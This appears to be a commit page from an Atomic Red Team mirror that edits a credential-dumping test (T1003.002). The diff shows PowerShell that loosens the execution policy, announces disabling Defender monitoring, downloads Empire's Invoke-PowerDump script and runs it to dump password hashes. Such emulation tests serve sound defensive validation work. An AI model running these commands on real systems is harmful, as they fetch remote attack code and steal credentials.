security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1003.002.yaml (#1212)

Browse Source 
Request raw Invoke-PowerDump.ps1 instead of repository page
This commit is contained in:
kpsmiley23
2020-09-03 17:48:52 -04:00
committed by GitHub
parent 04a409832e
commit 730a62b977
1 changed files with 1 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.002/T1003.002.yaml
+1 -1
View File
@@ -88,7 +88,7 @@ atomic_tests:
command: |-
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module .\PowerDump.ps1
Invoke-PowerDump
name: powershell